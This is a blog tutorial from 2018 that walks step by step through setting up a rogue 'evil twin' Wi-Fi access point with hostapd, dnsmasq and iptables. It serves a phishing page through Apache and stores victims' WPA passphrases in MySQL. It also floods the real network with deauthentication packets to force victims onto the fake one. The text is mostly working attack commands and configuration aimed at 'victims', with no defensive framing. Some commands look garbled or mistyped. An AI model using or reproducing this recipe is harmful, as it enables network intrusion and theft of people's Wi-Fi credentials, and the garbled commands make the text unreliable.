by hash3liZer . 18 June 2018
in this tutorial, i'll breifly explain how one can use Fake (Rogue) Access Point to sneak passphrases and other important target details over the air by showing targets a fabricated document. We will do hell of this task using hostapd, a well-written ad-hoc software. A Rogue (Fake) Access Point is plotted to tempt and influence users to perform involuntary tasks.
As this rogue network is nearly under the control of attacker because he is operating it, this allows him to stage several ill-natured attacks against the nodes.
If are not completely familiar with Rogue AP or it's been the first time you are reading this, this might not be for you. Before you dive deep into this, i recommend reading this one first: How to Setup Fake (Rogue) Access Point on Linux | aireplay-ng
Wireless protocols are greatly enhanced since 2003 after the evolution of WPA in the reign of WiFi protected Access. A Fake Access Point is simply a wireless network possessing most of the attributes, the target network comprised of. The more it looks factual and discharge strong signal strength over a reasonable distance, the more possibility there will exist of getting that particular task done.
Coerce or influence someone to perform unintentional tasks by showing a forged document or a falsified page is said to be the phishing way.
A perfect wireless adapter is the foremost neccassity of a fake wireless network. A card with support of promiscious mode and packet injection is required to operate it in monitor mode and send forged packets over the area. Another important thing is to operate it at a suplemental frequency though its not compulsory if the victim is roughly close to you. The Recommended one are:
Is it effective?
As have already discussed, it's effictiveness depend on illegitimacy of it's structure and how it is desgined. The more it looks factual and authentic, the more coercive attack it will be.
Before, we take a head-start, this tutorial is written on the basis of Kali Rolling 2018.1 as the attacker OS while any other platform could be taken as a choice of victim.
Update the environment and install required packages
sudo apt-get update sudo apt-get install hostapd dnsmasq apache2
This will install hostapd and dnsmasq and will update apache2 web server.
Find the adapter interface and put it in monitor mode. In my case the wireless interface is wlan1 as shown in the above screenshot. So,
airmon-ng start wlan1
Now, create a new folder under the home directory for the network files and navigate to that directory. For now, let's say fakeap is the directory. So,
mkdir /root/fakeap cd /root/fakeap
Setup a new hostapd configuration file and write the following instructions into the file:
interface=wlan1mon driver=nl80211 ssid=[Fake AP Name] hw_mode=g channel=[Fake AP Channel] macaddr_acl=0 ignore_broadcast_ssid=0
Press CTRL+X and then y to it. Note these three parameters in the above configuration:
Now, just initiate the fake access point:
MULTIPLE ACCESS POINTS [scripting] (optional)
If you have multiple targets or you are willing to write a script for multiple targets, hostapd provides this support too. You can provide multiple virtual interfaces to operate multiple networks from a single wireless card at a time. Tough it would slow down the whole process and would cause some other network problems. The standard usage of this is to host 3 networks from a single card at a time.
interface=wlan1mon hw_mode=g channel=6 country_code=US #FIRSTAP ssid=ap1 auth_algs=1 wpa=2 wpa_key_mgmt=WPA-PSK rsn_pairwise=TKIP wpa_passphrase=somepassword #SECONDAP bss=wlan2 # Interface for secondap ssid=ap2
Make Sure to remove the comments from the configuration provided above or it will throw a syntax error.
We have dnsmasq for this part. dnsmasq is a Dynamic Host Configuration Protocol (DHCP) server, with support of dns forwarder and some other network features. It certainly is fast and easier to modify. Open a new terminal and create a configuration file for dnsmasq.
interface=wlan1mon dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=184.108.40.206 log-queries log-dhcp listen-address=127.0.0.1
Note these paramters in the above instructions.
Assign the network Gateway and netmask to the interface and add the routing table.
ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Now, start dnsmasq server protocol.
dnsmasq -C dnsmasq.conf -d
Here, we will forward traffic from one interface to another, just in case you are eager to provide your victims Internet Access. This would help you perform various other Man-in-the-middel (MITM) attacks and hence, will increase the scope of your attack. After this, it would work most likely a functional wireless access point.
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface wlan1mon -j ACCEPT
Note these two parameters in the last two commands:
Now, just one step to go..
echo 1 > /proc/sys/net/ipv4/ip_forward
Now, we are required a site storage to store what's posted along the headers in the form fields. In the aireplay tutorial of setting up Rogue Access Point, we used a different approach to get the credentials. In fact, we sniffed the traffic travelling between the server and client to acheive our aim. But that didn't store the password permanently. An alternative approach of that is using database. So, we will use MySQL. Open MySQL and execute the below commands blind-folded.
mysql> create database rogueap; mysql> create user rogueuser; mysql> grant all on rogueap.* to 'rogueuser'@'localhost' identified by 'roguepassword'; mysql> use rogueap; mysql> create table wpa_keys(password1 varchar(30), password2 varchar(30)); mysql> ALTER DATABASE rogueap CHARACTER SET 'utf8';
What exactly happened back in the previous commands in short is:
When, the data from a user will be posted to server, whatever will be entered in those fields which we will see how in the subsequent steps, will be saved in this database table. Then after that you can check for table changes:
mysql> select * from wpa_keys;
Now, we are required a phishing site, a falsified page or a forged document, basically a web document to induce a user to enter his WiFi passphrase in the document fields. You better want to create your own. But for now, let just download this one:
Extract the zip file which will give you a new folder rogueap.
Remove all the current files under /var/www/html and move all rogueap files to this directory
rm -rf /var/www/html/* mv rogueap/* /var/www/html/
Start Apache2 and MySQL Services:
service apache2 start service mysql start
The main logic behind password storage is placed under the file dbconnect.php which is by now located under /var/www/html/ directory. Go on and open that file:
Note, the highlighted fields in the above picture. This is where database credentials are defined. It means if you mess with database configuration, you have to alter this file too or vice virsa.
Now, just redirect the network traffic to Gateway IP where our forged document is located:
dnssnoof -i wlan1mon
If until yet everything works, open the link 192.168.1.1 in your browser and see if the document is available. If it is, then try once entering any value in the fields and check in the database terminal if changes are commited.
This is another compliment to this attack. We will forcely disconnect the victims from the real network, so they would connect the forged network. For this, we will create an infinite loop of deauthentication packets for the target network.
aireplay-ng -00 -a BD:88:E8:7D:D8:F8 wlan2mon
Note the paramters:
The question arises here. Is it necassery to buy another wireless card to do this? No, you can use the same adapter for this part too. Just make sure that the wireless card doesn't change operating channel while dispatching packets which is by default in this case. Well, it's not always works. So, it's better to use another wireless adapter for this.
Let's play the victim role. When a victim after deauthentication connects to forged network, he will inevitably put himself into a situation where he will give away his password for the sake of internet usage. Well, as soon he sees our fake page and enter the passphrase in document fields, changes in database will be commited and we will get the password on fly.
So, come back to MySQL terminal and again check any changes to database:
mysql> select * from wpa_keys;
From this we be able to know that the password is p@ssword123.
We have seen to setup a fake access point to harvest potential data over the air. At first, we launched the AP base using hostapd, then we assgined the network some IP parameters and added some routing rules for traffic settlement. Then we seen to forward Internet for enhancing the phishing process. And at the end, we setup the Phishing site via apache Web Server and MySQL storage server.